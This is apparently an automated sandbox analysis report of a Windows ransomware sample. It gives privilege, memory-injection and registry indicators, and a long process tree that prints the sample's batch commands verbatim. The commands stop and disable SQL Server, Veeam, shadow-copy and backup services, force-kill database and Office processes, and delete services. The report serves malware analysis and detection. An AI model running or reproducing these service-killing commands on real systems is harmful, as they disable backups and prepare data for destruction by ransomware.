Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeDebugPrivilege	4588	net.exe
Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeDebugPrivilege	5208	taskkill.exe
Token: SeDebugPrivilege	5332	net1.exe
Token: SeDebugPrivilege	1188	Process not Found
Token: SeDebugPrivilege	5480	sc.exe
Token: SeDebugPrivilege	1816	Process not Found
Token: SeDebugPrivilege	2264	Process not Found
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5560	sc.exe
Token: SeDebugPrivilege	5952	net1.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	5436	net1.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	6116	taskkill.exe
Token: SeDebugPrivilege	2420	sc.exe
Token: SeDebugPrivilege	5612	Process not Found
Token: SeDebugPrivilege	4876	sc.exe
Token: SeDebugPrivilege	1780	net.exe
Token: SeDebugPrivilege	3848	sc.exe
Token: SeDebugPrivilege	5308	Process not Found
Token: SeDebugPrivilege	6128	Process not Found
Token: SeDebugPrivilege	5212	taskkill.exe
Token: SeDebugPrivilege	5604	taskkill.exe
Token: SeDebugPrivilege	5552	taskkill.exe
Token: SeDebugPrivilege	5528	taskkill.exe
Token: SeDebugPrivilege	5480	sc.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeDebugPrivilege	6072	Process not Found
Token: SeDebugPrivilege	4376	Process not Found
Token: SeDebugPrivilege	544	sc.exe
Token: SeDebugPrivilege	3540	Process not Found
Token: SeDebugPrivilege	4360	net1.exe
Token: SeDebugPrivilege	2624	net1.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	3996	sc.exe
Token: SeDebugPrivilege	6068	Process not Found
Token: SeDebugPrivilege	5124	taskkill.exe
Token: SeDebugPrivilege	2772	net1.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	5740	Process not Found
Token: SeDebugPrivilege	5576	taskkill.exe
Token: SeDebugPrivilege	5308	Process not Found
Token: SeDebugPrivilege	5864	Process not Found
Token: SeDebugPrivilege	5484	sc.exe
Token: SeDebugPrivilege	5508	Process not Found
Token: SeDebugPrivilege	6028	Process not Found
Token: SeDebugPrivilege	5272	taskkill.exe
Token: SeDebugPrivilege	5720	taskkill.exe
Token: SeDebugPrivilege	544	sc.exe
Token: SeDebugPrivilege	5728	Process not Found
Token: SeDebugPrivilege	5620	taskkill.exe
Token: SeDebugPrivilege	5192	DllHost.exe
Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2284 wrote to memory of 1616	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	93
PID 2284 wrote to memory of 1616	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	93
PID 2284 wrote to memory of 1616	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	93
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 2284 wrote to memory of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95
PID 1616 wrote to memory of 4628	1616	cmd.exe	96
PID 1616 wrote to memory of 4628	1616	cmd.exe	96
PID 1616 wrote to memory of 4628	1616	cmd.exe	96
PID 1616 wrote to memory of 692	1616	cmd.exe	99
PID 1616 wrote to memory of 692	1616	cmd.exe	99
PID 1616 wrote to memory of 692	1616	cmd.exe	99
PID 1616 wrote to memory of 3120	1616	cmd.exe	100
PID 1616 wrote to memory of 3120	1616	cmd.exe	100
PID 1616 wrote to memory of 3120	1616	cmd.exe	100
PID 1616 wrote to memory of 456	1616	cmd.exe	122
PID 1616 wrote to memory of 456	1616	cmd.exe	122
PID 1616 wrote to memory of 456	1616	cmd.exe	122
PID 1616 wrote to memory of 1928	1616	cmd.exe	121
PID 1616 wrote to memory of 1928	1616	cmd.exe	121
PID 1616 wrote to memory of 1928	1616	cmd.exe	121
PID 1616 wrote to memory of 1476	1616	cmd.exe	102
PID 1616 wrote to memory of 1476	1616	cmd.exe	102
PID 1616 wrote to memory of 1476	1616	cmd.exe	102
PID 1616 wrote to memory of 2700	1616	cmd.exe	120
PID 1616 wrote to memory of 2700	1616	cmd.exe	120
PID 1616 wrote to memory of 2700	1616	cmd.exe	120
PID 1616 wrote to memory of 228	1616	cmd.exe	118
PID 1616 wrote to memory of 228	1616	cmd.exe	118
PID 1616 wrote to memory of 228	1616	cmd.exe	118
PID 1616 wrote to memory of 3464	1616	cmd.exe	116
PID 1616 wrote to memory of 3464	1616	cmd.exe	116
PID 1616 wrote to memory of 3464	1616	cmd.exe	116
PID 1616 wrote to memory of 2008	1616	cmd.exe	114
PID 1616 wrote to memory of 2008	1616	cmd.exe	114
PID 1616 wrote to memory of 2008	1616	cmd.exe	114
PID 1616 wrote to memory of 1968	1616	cmd.exe	106
PID 1616 wrote to memory of 1968	1616	cmd.exe	106
PID 1616 wrote to memory of 1968	1616	cmd.exe	106
PID 1616 wrote to memory of 3136	1616	cmd.exe	109
PID 1616 wrote to memory of 3136	1616	cmd.exe	109
PID 1616 wrote to memory of 3136	1616	cmd.exe	109
PID 1616 wrote to memory of 640	1616	cmd.exe	108
PID 1616 wrote to memory of 640	1616	cmd.exe	108
PID 1616 wrote to memory of 640	1616	cmd.exe	108
PID 1616 wrote to memory of 3572	1616	cmd.exe	107
PID 1616 wrote to memory of 3572	1616	cmd.exe	107
PID 1616 wrote to memory of 3572	1616	cmd.exe	107
PID 1616 wrote to memory of 3688	1616	cmd.exe	123
PID 1616 wrote to memory of 3688	1616	cmd.exe	123
PID 1616 wrote to memory of 3688	1616	cmd.exe	123
PID 1616 wrote to memory of 4568	1616	cmd.exe	126
PID 1616 wrote to memory of 4568	1616	cmd.exe	126
PID 1616 wrote to memory of 4568	1616	cmd.exe	126
PID 1616 wrote to memory of 3712	1616	net.exe	128
PID 1616 wrote to memory of 3712	1616	net.exe	128
PID 1616 wrote to memory of 3712	1616	net.exe	128

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
"C:\Users\Admin\AppData\Local\Temp\df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\killerr.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
    3⤵
    PID:4628
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:4280
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:4300
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:3388
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:4588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:5800
  - - C:\Windows\SysWOW64\net.exe
      net stop "MsDtsServer130"
      4⤵
      PID:2412
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer130"
        5⤵
        
        PID:1336
  - - C:\Windows\SysWOW64\net.exe
      net stop "SSISTELEMETRY130"
      4⤵
      PID:5240
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SSISTELEMETRY130"
        5⤵
        
        PID:3568
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLWrite"
      4⤵
      PID:1228
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWrite"
        5⤵
        
        PID:5352
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:5008
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:4576
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:3508
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:5460
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL"
      4⤵
      PID:5160
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent"
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent"
        5⤵
        
        PID:5940
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:2516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:5464
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:5492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:4476
  - - C:\Windows\SysWOW64\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:6092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:5444
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer"
      4⤵
      PID:5940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:2060
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLTELEMETRY$HL"
      4⤵
      PID:1268
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$HL"
        5⤵
        
        PID:5788
  - - C:\Windows\SysWOW64\net.exe
      net stop "TMBMServer"
      4⤵
      PID:5228
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$PROGID"
      4⤵
      PID:1800
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROGID"
        5⤵
        
        PID:5676
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$WOLTERSKLUWER"
      4⤵
      PID:5720
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$WOLTERSKLUWER"
        5⤵
        
        PID:5180
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$PROGID"
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROGID"
        5⤵
        
        PID:5972
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$WOLTERSKLUWER"
      4⤵
      PID:5920
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$WOLTERSKLUWER"
        5⤵
        
        PID:5604
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher$OPTIMA"
      4⤵
      PID:5952
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$OPTIMA"
        5⤵
        
        PID:5624
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$OPTIMA"
      4⤵
      PID:3848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$OPTIMA"
        5⤵
        
        PID:5544
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$OPTIMA"
      4⤵
      PID:5916
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$OPTIMA"
        5⤵
        
        PID:5472
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer$OPTIMA"
      4⤵
      PID:5116
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$OPTIMA"
        5⤵
        
        PID:5820
  - - C:\Windows\SysWOW64\net.exe
      net stop "msftesql$SQLEXPRESS"
      4⤵
      PID:3408
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$SQLEXPRESS"
        5⤵
        
        PID:5200
  - - C:\Windows\SysWOW64\net.exe
      net stop "postgresql-x64-9.4"
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\sc.exe
      sc config "MSSQLFDLauncher" start= disabled
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLSERVERAGENT" start= disabled
      4⤵
      PID:5748
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQLBrowser" start= disabled
      4⤵
      PID:7544
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
    3⤵
    PID:692
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQLSERVER start=disabled
      4⤵
      Launches sc.exe
      PID:1060
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQL Server (MSSQLSERVER)" start=disabled
      4⤵
      Launches sc.exe
      PID:4828
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$
      4⤵
      PID:3200
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$
        5⤵
        
        PID:1844
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDiagnostics
        6⤵
        
        PID:5912
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$ start=disabled
      4⤵
      PID:5856
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLSERVERAGENT
      4⤵
      PID:3436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSERVERAGENT
        5⤵
        
        PID:4288
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLSERVERAGENT start=disabled
      4⤵
      PID:5456
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLBrowser
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        5⤵
        
        PID:4576
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLBrowser start=disabled
      4⤵
      PID:5392
  - - C:\Windows\SysWOW64\net.exe
      net stop vss
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vss
        5⤵
        
        PID:5264
  - - C:\Windows\SysWOW64\sc.exe
      sc config vss start=disabled
      4⤵
      Launches sc.exe
      PID:676
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLWriter
      4⤵
      PID:5524
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        5⤵
        
        PID:6124
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLWriter start=disabled
      4⤵
      PID:4540
  - - C:\Windows\SysWOW64\net.exe
      net stop vmvss
      4⤵
      PID:1448
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vmvss
        5⤵
        
        PID:2984
  - - C:\Windows\SysWOW64\sc.exe
      sc config vmvss start=disabled
      4⤵
      Launches sc.exe
      PID:5216
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$FE_EXPRESS start= disabled
      4⤵
      PID:2348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop cbVSCService
        5⤵
        
        PID:4540
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$RE_EXPRESS
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$RE_EXPRESS
        5⤵
        
        PID:716
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLANYs_Sage_FAS_Fixed_Assets
      4⤵
      PID:1056
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLANYs_Sage_FAS_Fixed_Assets
        5⤵
        
        PID:5684
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
      4⤵
      PID:1204
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VIM_SQLEXP
      4⤵
      PID:1724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VIM_SQLEXP
        5⤵
        
        PID:4952
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$VIM_SQLEXP start=disabled
      4⤵
      PID:5548
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:5308
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:5448
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
    3⤵
    PID:3120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
      4⤵
      PID:3292
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.BrokerService.exe
      4⤵
      PID:5332
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CatalogDataService.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1708
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CloudService.exe
      4⤵
      PID:5308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Manager.exe
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.MountService.exe
      4⤵
      PID:5124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Service.exe
      4⤵
      PID:5484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.WmiServer.exe
      4⤵
      PID:5192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDagMgmt
        5⤵
        
        PID:5528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamDeploymentSvc.exe
      4⤵
      PID:5284
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamNFSSvc.exe
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM VeeamTransportSvc.exe
      4⤵
      PID:5552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlbrowser.exe
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlceip.exe
      4⤵
      PID:5852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlservr.exe
      4⤵
      PID:5548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlwriter.exe
      4⤵
      PID:5872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM sqlagentc.exe
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM ReportingServicesService.exe
      4⤵
      PID:6032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Ssms.exe
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM fdhost.exe
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM fdlauncher.exe
      4⤵
      Kills process with taskkill
      PID:5968
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MsDtsSrvr.exe
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msmdsrv.exe
      4⤵
      PID:1568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM mysql.exe
      4⤵
      Kills process with taskkill
      PID:6112
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM mysqld.exe
      4⤵
      PID:1900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM w3wp.exe
      4⤵
      PID:6076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM wsusservice.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM SageCSClient.exe
      4⤵
      Kills process with taskkill
      PID:3896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Launchpad.exe
      4⤵
      PID:2680
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dbsrv12.exe
      4⤵
      PID:5612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM EXCEL.EXE
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM OUTLOOK.EXE
      4⤵
      Kills process with taskkill
      PID:8136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM WINWORD.EXE
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM OneDrive.exe
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM TaskService.exe
      4⤵
      PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"
    3⤵
    PID:1476
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DDSoftPwsTomcat9.exe /F
      4⤵
      PID:4588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClient.exe /F
      4⤵
      Kills process with taskkill
      PID:5256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClientMonitor.exe /F
      4⤵
      PID:2420
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tomcat9.exe /F
      4⤵
      PID:5480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SqlManagement.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3720
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
      4⤵
      PID:5300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ReportingServicesService.exe /F
      4⤵
      PID:6028
  - - C:\Windows\SysWOW64\sc.exe
